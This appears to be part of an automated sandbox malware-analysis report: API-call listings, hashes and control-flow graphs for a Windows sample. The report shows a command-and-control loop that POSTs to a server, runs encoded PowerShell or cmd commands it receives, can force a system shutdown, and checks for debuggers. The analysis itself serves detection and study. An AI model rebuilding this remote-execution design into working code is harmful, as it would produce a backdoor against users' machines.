                • Opcode Fuzzy Hash: 901ede800b86963bba1ef4a6e873e1d648c13f5fe61ba17a7b64dfd7d341bf97
                • Instruction Fuzzy Hash: 6801A231A45208FBDB209FE4DD0EFEE7BBCEB04701F100068FA15E6180D7704A5497A5
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00794228
                • IsDebuggerPresent.KERNEL32 ref: 007942F4
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00794314
                • UnhandledExceptionFilter.KERNEL32(?), ref: 0079431E
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                • String ID:
                • API String ID: 254469556-0
                • Opcode ID: 2257d9c26c05bb3da1bc982d9616153fcee5474eb6231374b1cc9c4c122186ce
                • Instruction ID: 1bc48ac3d8170397d06aa44c0c065bbaeae74e5fddd6539e5186efc5ed699354
                • Opcode Fuzzy Hash: 2257d9c26c05bb3da1bc982d9616153fcee5474eb6231374b1cc9c4c122186ce
                • Instruction Fuzzy Hash: BC312975D0525CDBDF20DFA4E989BCDBBB8BF18304F5080AAE40CAB250EB755A858F05
                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00796A53
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00796A5D
                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00796A6A
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 4861f67bd0549d7c725927d953e9729b4732a1b26391eb8efa90df51e21669cf
                • Instruction ID: 9153eff5d09be0b55df77a5c6948f922051b89270d71bd9cc1cdfe2539094f4a
                • Opcode Fuzzy Hash: 4861f67bd0549d7c725927d953e9729b4732a1b26391eb8efa90df51e21669cf
                • Instruction Fuzzy Hash: E531A4759012299BCF21DF64EC89B9DBBB8BF48710F5082EAE41CA7250E7749F858F44
                APIs
                • GetCurrentProcess.KERNEL32(?,?,007975A1,?,?,?,?,?,0079C8FA), ref: 007975C4
                • TerminateProcess.KERNEL32(00000000,?,007975A1,?,?,?,?,?,0079C8FA), ref: 007975CB
                • ExitProcess.KERNEL32 ref: 007975DD
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: aa5c98773a3aa283dbeef73ab1cfe14334a132aa0fb343b00b25bd806f9eda23
                • Instruction ID: 00d531304355c296e872c4193522c8996e77ad56c53ddf67a53e7d1ea6fff295
                • Opcode Fuzzy Hash: aa5c98773a3aa283dbeef73ab1cfe14334a132aa0fb343b00b25bd806f9eda23
                • Instruction Fuzzy Hash: 56E08C31020588EFDF152F58EE8C9493B68EB81342F428014FA08C6131CF3DDD92CB65
                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0079E878,?,?,00000008,?,?,0079E510,00000000), ref: 0079EAAA
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: 5eea61a9c5e0ecf24e1a2b566b617c20c7759777f29d1316fc7971c086d22d95
                • Instruction ID: 7cf6f5fee5c9287ff64b8889c49422ba751fa4cd37b7a16770dcf1fc550770d6
                • Opcode Fuzzy Hash: 5eea61a9c5e0ecf24e1a2b566b617c20c7759777f29d1316fc7971c086d22d95
                • Instruction Fuzzy Hash: C2B14A71610608DFDB18CF28D48AB657BA0FF45364F298658E8DACF2A1C339ED81CB40
                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007944DB
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: FeaturePresentProcessor
                • String ID:
                • API String ID: 2325560087-0
                • Opcode ID: 316fa61e77cd0b4f69c61ed0400c9fb00556b4d583e09624afd3ddcd15d5ee07
                • Instruction ID: 77558f26702fd1411cccbb09d84bfba81079fb908827b05fad0a5a5380194f23
                • Opcode Fuzzy Hash: 316fa61e77cd0b4f69c61ed0400c9fb00556b4d583e09624afd3ddcd15d5ee07
                • Instruction Fuzzy Hash: 355181B19022058FDB68CF98E885BAABBF0FB85310F14C869D411EB250EB7C9951CF61
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ddeb98fd3cf9b44228f3445322740f0e0a7d4ad35907f119b5d86a389bfb3194
                • Instruction ID: 702628b0ec2935b297a4c016189ac851564603e24e08765aba15a9711bd00915
                • Opcode Fuzzy Hash: ddeb98fd3cf9b44228f3445322740f0e0a7d4ad35907f119b5d86a389bfb3194
                • Instruction Fuzzy Hash: EB31E6B2900219AFCF24DF68DC89DBB77B9EB86310F544199F91593240EE34AE40CB60
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: CountTick
                • String ID:
                • API String ID: 536389180-0
                • Opcode ID: dfa331efd82a23266d69362560e85e45ea632975d2acd74d6abd28e4a7da0232
                • Instruction ID: 60890d6120873131b93b8215b356fe80a7def8af228de9fc9908110a266a2bdd
                • Opcode Fuzzy Hash: dfa331efd82a23266d69362560e85e45ea632975d2acd74d6abd28e4a7da0232
                • Instruction Fuzzy Hash: E3318C722144118BC36CCF28F8ADA6577E5FB89310B19823DD53ECB289D778E892CB50
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_000043BB,00793BBB), ref: 007943B4
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 372afebcfb980362f11ccf36ddaa5b45f0c70be94964f7c27aeb6b399a0e3b84
                • Instruction ID: a535a44fd043836c9cb598059d29f8b205e0b0327a0d88b67671409a1531b295
                • Opcode Fuzzy Hash: 372afebcfb980362f11ccf36ddaa5b45f0c70be94964f7c27aeb6b399a0e3b84
                • Instruction Fuzzy Hash:
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 0
                • API String ID: 0-4108050209
                • Opcode ID: 4ac7998192c75c9670cedc4d86e067f12e7163e6d39f06fbc1c219510fbfdc62
                • Instruction ID: fe36e1c2e144d89f6ec528259e6252dd885156030def9cf59a3392ae16736aff
                • Opcode Fuzzy Hash: 4ac7998192c75c9670cedc4d86e067f12e7163e6d39f06fbc1c219510fbfdc62
                • Instruction Fuzzy Hash: 1051C531E143D84EDB1D8BEC58541FCBFB19F56200F5841AEDC9AA7682C6384A09CB61
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: d6a54096869addcbbccc140c86804edebb8353a91f282c6d2e48fa94b5680303
                • Instruction ID: 45b5d546a5b0dc66037450c0a2db1123126f76dd047ceb64ef9b702cb34a1f74
                • Opcode Fuzzy Hash: d6a54096869addcbbccc140c86804edebb8353a91f282c6d2e48fa94b5680303
                • Instruction Fuzzy Hash: 83A012303001808B53008F309A0524936985686580B0180185504C5120DB2844504615
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d6865c081a1309161320541036ca59e73264a56c2bbd692dcbec766834973040
                • Instruction ID: f459bab07855b9d6eb15052cabbddaed18570e1aa1d24b2680f760ddaec6e25f
                • Opcode Fuzzy Hash: d6865c081a1309161320541036ca59e73264a56c2bbd692dcbec766834973040
                • Instruction Fuzzy Hash: FD726E348241AE8EDB1DEB64D8646ECB735BF32314F5401FDC64A13996EB305A8ACF61
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
                • Instruction ID: 30c601da28732d0c86addaa5ccfa9ad3a7112a4d71085d051946d182f3a63628
                • Opcode Fuzzy Hash: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
                • Instruction Fuzzy Hash: D95164B1A11A10CFCB68CF2EC591556BBF1BF8C324355896EA98ACB625E334F840CF51
                Memory Dump Source
                • Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                • Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fe8cb0350e4e3b143060300173f47f5aae99c96b2ead98911347758da5d435a3
                • Instruction ID: 0a348d72bc072292fd38a073a683f6fe1f56eda08e2aca903bba95e6a3985898
                • Opcode Fuzzy Hash: fe8cb0350e4e3b143060300173f47f5aae99c96b2ead98911347758da5d435a3
                • Instruction Fuzzy Hash: BEE08C72A22238EBCF14DFCDE94898AF3ECEB84B40B15449AB601D3101C674DE00C7D0

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 387 11f7d50-11f7da5 wsprintfA GetTickCount64 call 11f2610 390 11f7da8-11f7dc9 call 11f66a0 387->390 393 11f7ddd-11f7deb lstrcmpA 390->393 394 11f7dcb-11f7ddb Sleep 390->394 395 11f7dfe-11f7e28 call 11f6450 * 2 call 11f6290 393->395 396 11f7ded-11f7dfc call 11f8f40 call 11f5610 393->396 394->390 407 11f7e2e-11f7e30 395->407 408 11f82ab-11f82c9 GetTickCount64 395->408 396->390 407->408 409 11f7e36-11f7e3c 407->409 410 11f82ee-11f830b call 11f5610 Sleep 408->410 411 11f82cb 408->411 409->408 412 11f7e42-11f7eb5 call 11f5630 call 11f7440 call 11f2470 call 11f55f0 call 11f5630 call 11f6450 call 11f2610 call 11f7420 StrToIntA 409->412 410->390 414 11f82cd-11f82cf 411->414 415 11f82d1-11f82eb call 11f2610 call 11f7420 411->415 437 11f7ebb 412->437 438 11f82a1-11f82a9 call 11f5610 412->438 414->410 414->415 415->410 440 11f8283-11f828a call 11f6210 437->440 441 11f7ec2-11f7ed6 call 11f6450 * 2 437->441 438->410 440->438 447 11f828c-11f829b InitiateSystemShutdownExW 440->447 441->438 450 11f7edc-11f7ede 441->450 447->438 450->438 451 11f7ee4-11f7f0d StrToIntA call 11f6290 call 11f55f0 450->451 451->438 456 11f7f13-11f7f19 451->456 457 11f7f5f-11f7f62 456->457 458 11f7f1b-11f7f5d GetSystemDirectoryW PathCombineW wnsprintfW 456->458 459 11f7fb4-11f7ffb GetModuleHandleA GetProcAddress * 2 457->459 460 11f7f64-11f7f7d call 11f6290 call 11f2750 457->460 458->459 462 11f7ffd-11f8000 459->462 463 11f8003-11f8007 459->463 460->459 473 11f7f7f-11f7faf ExpandEnvironmentStringsW wnsprintfW call 11f5610 460->473 462->463 465 11f8009-11f801e call 11f56e0 463->465 466 11f8041-11f8065 LoadLibraryA GetProcAddress 463->466 471 11f8069-11f806e 465->471 472 11f8020-11f803f call 11f6290 call 11f2640 call 11f5610 465->472 466->471 474 11f8075-11f8087 call 11f55f0 471->474 475 11f8070 471->475 472->471 473->459 481 11f808d-11f8112 call 11f8ed0 call 11f7440 wsprintfA wnsprintfA call 11f2470 call 11f66a0 474->481 482 11f8128-11f813f call 11f5610 * 3 474->482 475->474 501 11f811b-11f8125 call 11f5610 481->501 502 11f8114-11f8116 call 11f5610 481->502 482->410 501->482 502->501
                APIs
                • wsprintfA.USER32 ref: 011F7D76
                • GetTickCount64.KERNEL32 ref: 011F7D84
                  • Part of subcall function 011F66A0: ObtainUserAgentString.URLMON(00000000,?,?), ref: 011F66C2
                  • Part of subcall function 011F66A0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 011F66E2
                  • Part of subcall function 011F66A0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 011F6748
                  • Part of subcall function 011F66A0: InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 011F6781
                  • Part of subcall function 011F66A0: InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 011F679E
                  • Part of subcall function 011F66A0: HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 011F67D7
                  • Part of subcall function 011F66A0: InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 011F6800
                • Sleep.KERNEL32(00000000), ref: 011F7DD6
                • lstrcmpA.KERNEL32(00000000,INIT), ref: 011F7DE3
                • StrToIntA.SHLWAPI(00000000), ref: 011F7EA6
                • StrToIntA.SHLWAPI(00000000), ref: 011F7EEB
                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 011F7F27
                • PathCombineW.SHLWAPI(?,?,WindowsPowerShell\v1.0\powershell.exe), ref: 011F7F40
                • wnsprintfW.SHLWAPI ref: 011F7F54
                • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 011F7F90
                • wnsprintfW.SHLWAPI ref: 011F7FA4
                  • Part of subcall function 011F5610: GetProcessHeap.KERNEL32(00000000,00000000,011F82F5), ref: 011F5617
                  • Part of subcall function 011F5610: HeapFree.KERNEL32(00000000), ref: 011F561E
                • GetModuleHandleA.KERNEL32(kernel32), ref: 011F7FC7
                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 011F7FD5
                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 011F7FEA
                • LoadLibraryA.KERNEL32(shell32,ShellExecuteW), ref: 011F804B
                • GetProcAddress.KERNEL32(00000000), ref: 011F8052
                • wsprintfA.USER32 ref: 011F80B2
                • wnsprintfA.SHLWAPI ref: 011F80DE
                  • Part of subcall function 011F2750: GetProcessHeap.KERNEL32(00000008,?), ref: 011F2762
                  • Part of subcall function 011F2750: HeapAlloc.KERNEL32(00000000), ref: 011F2769
                • Sleep.KERNEL32(00000000), ref: 011F8306
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: HeapInternet$AddressProcwnsprintf$OpenOptionProcessSleepwsprintf$AgentAllocByteCharCombineConnectCount64DirectoryEnvironmentExpandFreeHandleHttpLibraryLoadModuleMultiObtainPathQueryRequestStringStringsSystemTickUserWidelstrcmp
                • String ID: -enc %S$ /c %S$%ComSpec%$%d|%s$%d|%s|%.16s|$%s|%s$INIT$ShellExecuteW$WindowsPowerShell\v1.0\powershell.exe$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$open$shell32
                • API String ID: 1920831074-1153165106
                • Opcode ID: a880412d8b71231d48da24f933715f0a02f00a0e615c394cebdc25b70adf803d
                • Instruction ID: 013a3c062c178dd9a3f0c5d1b7fa5f28ade89ffcb5d9c6778962bfb5cd889431
                • Opcode Fuzzy Hash: a880412d8b71231d48da24f933715f0a02f00a0e615c394cebdc25b70adf803d
                • Instruction Fuzzy Hash: A7C1C271E00209ABDB1CEFB4DC44BAEBBB5AF54714F10042DEB16A7280DB74AE44CB94

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 506 11f66a0-11f66e8 ObtainUserAgentString MultiByteToWideChar 507 11f66ea-11f66ef 506->507 508 11f66f1-11f670d GetProcessHeap HeapAlloc 506->508 509 11f6729-11f6738 call 11f64e0 507->509 510 11f670f-11f6725 MultiByteToWideChar 508->510 511 11f6727 508->511 514 11f673a-11f6752 InternetOpenW 509->514 510->509 511->509 515 11f6758-11f676f 514->515 516 11f68d6-11f68da 514->516 517 11f6776-11f678b InternetSetOptionW 515->517 518 11f68dc-11f68e1 516->518 519 11f68e6-11f68f7 516->519 517->517 520 11f678d-11f67ab InternetConnectW 517->520 518->514 521 11f68f9-11f68ff GetProcessHeap HeapFree 519->521 522 11f6901-11f6906 519->522 523 11f68c8-11f68d1 InternetCloseHandle 520->523 524 11f67b1-11f67e1 HttpOpenRequestW 520->524 521->522 525 11f6908-11f690e GetProcessHeap HeapFree 522->525 526 11f6910-11f6915 522->526 523->519 531 11f68d3 523->531 529 11f68bc 524->529 530 11f67e7-11f6808 InternetQueryOptionW 524->530 525->526 527 11f691f-11f6927 526->527 528 11f6917-11f691d GetProcessHeap HeapFree 526->528 528->527 532 11f68c2-11f68c5 InternetCloseHandle 529->532 533 11f680a-11f681a InternetSetOptionW 530->533 534 11f6820-11f6836 HttpSendRequestW 530->534 531->516 532->523 533->534 535 11f6838-11f683a 534->535 536 11f68b1-11f68ba InternetCloseHandle 534->536 537 11f6840-11f685b InternetQueryDataAvailable 535->537 536->532 538 11f685d-11f6865 537->538 539 11f68a1-11f68a3 537->539 541 11f6878-11f6882 GetProcessHeap HeapReAlloc 538->541 542 11f6867-11f6876 GetProcessHeap HeapAlloc 538->542 539->537 540 11f68a5-11f68aa 539->540 544 11f68ae 540->544 545 11f68ac 540->545 543 11f6888-11f689f InternetReadFile 541->543 542->543 543->539 544->536 545->544
                APIs
                • ObtainUserAgentString.URLMON(00000000,?,?), ref: 011F66C2
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 011F66E2
                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 011F66FB
                • HeapAlloc.KERNEL32(00000000), ref: 011F6702
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 011F6723
                • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 011F6748
                • InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 011F6781
                • InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 011F679E
                • HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 011F67D7
                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 011F6800
                • InternetSetOptionW.WININET(00000000,0000001F,00003180,00000004), ref: 011F681A
                • HttpSendRequestW.WININET(00000000,Content-Type: application/octet-streamContent-Encoding: binary,000000FF,?,?), ref: 011F682E
                • InternetQueryDataAvailable.WININET(00000000,00000000,00000000,00000000), ref: 011F6850
                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 011F6869
                • HeapAlloc.KERNEL32(00000000), ref: 011F6870
                • GetProcessHeap.KERNEL32(00000008,?,00000000), ref: 011F687B
                • HeapReAlloc.KERNEL32(00000000), ref: 011F6882
                • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 011F6896
                • InternetCloseHandle.WININET(00000000), ref: 011F68B8
                • InternetCloseHandle.WININET(00000000), ref: 011F68C3
                • InternetCloseHandle.WININET(00000000), ref: 011F68C9
                • GetProcessHeap.KERNEL32(00000000,?), ref: 011F68FC
                • HeapFree.KERNEL32(00000000), ref: 011F68FF
                • GetProcessHeap.KERNEL32(00000000,?), ref: 011F690B
                • HeapFree.KERNEL32(00000000), ref: 011F690E
                • GetProcessHeap.KERNEL32(00000000,?), ref: 011F691A
                • HeapFree.KERNEL32(00000000), ref: 011F691D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true
                • Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd
                Yara matches
                Similarity
                • API ID: Heap$Internet$Process$AllocCloseFreeHandleOption$ByteCharHttpMultiOpenQueryRequestWide$AgentAvailableConnectDataFileObtainReadSendStringUser
                • String ID: Content-Type: application/octet-streamContent-Encoding: binary$POST$`
                • API String ID: 2744214989-3343008755
                • Opcode ID: 96b55c79c12d95b3c9b7f780866649898ebb624e1e879543dc8553a07d1a0935
                • Instruction ID: a221cbf1d1db24faed8f0ba2ea20175a6153576792e3f7683a1eb87bacedd686
                • Opcode Fuzzy Hash: 96b55c79c12d95b3c9b7f780866649898ebb624e1e879543dc8553a07d1a0935
                • Instruction Fuzzy Hash: B97163B1A44219BBEB259BA4DC45FAE7BBCEB04710F14412DFB11F7280D7709944CB64

                Control-flow Graph

                APIs
                  • Part of subcall function 00793040: char_traits.LIBCPMTD ref: 00793080
                  • Part of subcall function 007926F0: operator!=.LIBCPMTD ref: 007927B9
                  • Part of subcall function 007926F0: task.LIBCPMTD ref: 007927CA
                  • Part of subcall function 007926F0: task.LIBCPMTD ref: 007927D9
                  • Part of subcall function 00792870: task.LIBCPMTD ref: 00792889
                  • Part of subcall function 00792A60: task.LIBCPMTD ref: 00792AB3
                  • Part of subcall function 00792A60: task.LIBCPMTD ref: 00792AC2
                • task.LIBCPMTD ref: 00792C96
                  • Part of subcall function 00792450: task.LIBCPMTD ref: 007924E6
                  • Part of subcall function 00792450: task.LIBCPMTD ref: 007924F2
                  • Part of subcall function 00792450: task.LIBCPMTD ref: 007924FE
                  • Part of subcall function 00792450: task.LIBCPMTD ref: 0079250A
                  • Part of subcall function 00792450: task.LIBCPMTD ref: 00792519
                  • Part of subcall function 00791BD0: task.LIBCPMTD ref: 00791C63
                  • Part of subcall function 00791BD0: task.LIBCPMTD ref: 00791C72
                  • Part of subcall function 00791D30: operator!=.LIBCPMTD ref: 00791DB9
                  • Part of subcall function 00791D30: task.LIBCPMTD ref: 00791DC7
                  • Part of subcall function 00791D30: task.LIBCPMTD ref: 00791DD6
                  • Part of subcall function 00791E90: task.LIBCPMTD ref: 00791F50
                  • Part of subcall function 00791E90: task.LIBCPMTD ref: 00791F5F
                  • Part of subcall function 00791FF0: task.LIBCPMTD ref: 0079204A
                  • Part of subcall function 00791FF0: task.LIBCPMTD ref: 00792056
                  • Part of subcall function 00791FF0: task.LIBCPMTD ref: 00792065
                  • Part of subcall function 00792090: task.LIBCPMTD ref: 007920E6
                • task.LIBCPMTD ref: 00792E58
                • task.LIBCPMTD ref: 00792EFC
                  • Part of subcall function 007921A0: operator!=.LIBCPMTD ref: 00792294
